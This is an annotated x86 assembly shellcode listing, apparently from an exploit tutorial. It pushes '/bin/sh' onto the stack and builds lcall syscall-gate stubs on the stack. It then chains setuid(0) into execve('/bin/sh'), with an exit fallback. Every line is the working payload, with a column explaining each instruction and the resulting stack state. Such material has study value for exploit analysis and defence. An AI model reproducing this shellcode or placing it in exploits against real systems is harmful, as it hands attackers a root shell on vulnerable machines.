; The assembly instructions | Action | Stack 1: xorl %eax, %eax | eax = 0; | 2: xorl %ecx, %ecx | ecx = 0; | 3: addb $0x68, %cl | ecx = 0x68; | 4: pushw %cx | put ecx on top of stack | = [ h\0 ] 5: pushw $0x732f | put /s on top of stack | = [ /sh\0 ] 6: pushl $0x6e69622f | put /bin on top of stack | + [ /bin ] 7: movl %esp, %ebx | ebx = &"/bin/sh" | 8: pushl %eax | put NULL on top of stack | + [0x00000000] 9: pushl %ebx | put &"/bin/sh" on tos | + [ ebx ] 10: addb $0xdf, %cl | ecx = 0x47 | 11: pushw %cx | put 0x47 on tos | _ 12: pushl %eax | put 0x00 on tos | _ 13: movw $0x9a90, %dx | edx = NOP ; LCALL | _ 14: pushw %dx | put NOP ; LCALL on tos | + lcall $0x47, | | $0x00000000 15: pushw $0xc033 | put 'xorl %eax, %eax' on tos | + [ 0xc033 ] 16: pushw %cx | _ | _ 17: pushl %eax | _ | _ 18: pushw %dx | put NOP ; LCALL on tos | + lcall $0x47, | | $0x00000000 19: pushw $0x5890 | put POPL %EAX on tos | + [ 0x5890 ] 20: pushw %cx | _ | _ 21: pushl %eax | _ | _ 22: pushw %dx | put NOP ; LCALL on tos | + lcall $0x47, | | $0x00000000 23: movl %esp, %ecx | esp = &lcall, pop, lcall, .. | 24: movl %ebx, %edx | edx = &"/bin/sh" | 25: addl $0xfffffff8, %edx | edx = &&"/bin/sh" (9) | 26: pushl %edx | put (9) on tos (env) | + [ ebx - 8 ] 27: pushl %edx | put (9) on tos (argv) | + [ ebx - 8 ] 28: pushl %ebx | put ebx on tos (path) | + [ ebx ] 29: pushl %eax | put $0x0 on tos (uid -> 0) | + [0x00000000] 30: addb $0x11, %al | eax = $0x11 | 31: pushl %eax | put 0x11 (n. of execve sysc) | + [0x00000011] 32: pushl %ecx | put offset of 1st lcall | + [ ebx - x ] 33: addb $0x25, %al | eax = 0x36 (n. of setuid sc) | 34: ret | eip = ecx | Upon ret the stack has: 0x00000011 0x00000000 0x.....ebx 0x....&ebx 0x....&ebx eax = 0x36 syscall -> uid = euid = 0 popl eax -> eax = 0x11, stack = 0x00000000 0x...... syscall -> execve("/bin/sh", argv, argv); xorl eax, eax -> eax = 0 syscall -> exit (if failure of execve)